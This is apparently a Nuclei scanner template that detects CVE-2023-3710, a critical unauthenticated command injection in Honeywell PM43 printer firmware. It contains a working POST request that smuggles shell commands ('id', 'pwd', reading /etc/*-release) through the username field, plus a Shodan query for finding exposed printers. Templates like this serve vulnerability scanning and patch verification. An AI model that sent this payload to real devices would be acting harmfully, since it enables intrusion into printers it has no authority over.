2023-10-15 13:57:25 +00:00
id: CVE-2023-3710

info:
  name: Honeywell PM43 Printers - Command Injection
  author: win3zz
  severity: critical
  description: |
    Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection. This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3710
    - https://github.com/vpxuser/CVE-2023-3710-POC
    - https://twitter.com/win3zz/status/1713451282344853634
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
    - https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3710
    cwe-id: CWE-77,CWE-20
    epss-score: 0.74016
    epss-percentile: 0.97809
    cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: honeywell
    product: pm43_firmware
    shodan-query: http.html:"/main/login.lua?pageid="
  tags: cve,cve2023,honeywell,pm43,printer,iot,rce

http:
  - raw:
      - |
        POST /loadfile.lp?pageid=Configure HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'

      - type: word
        part: body
        words:
          - 'Release date'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a2e6d429c658e182b5e4b72623ba067413f18a96e6d751bc8c87ec010f89cc6d022100ae34bf03a122e65592cac47f9b0612ba014e3936c165f0ea9a2dc975506f9da9:922c64590222798bb761d5b6d8e72950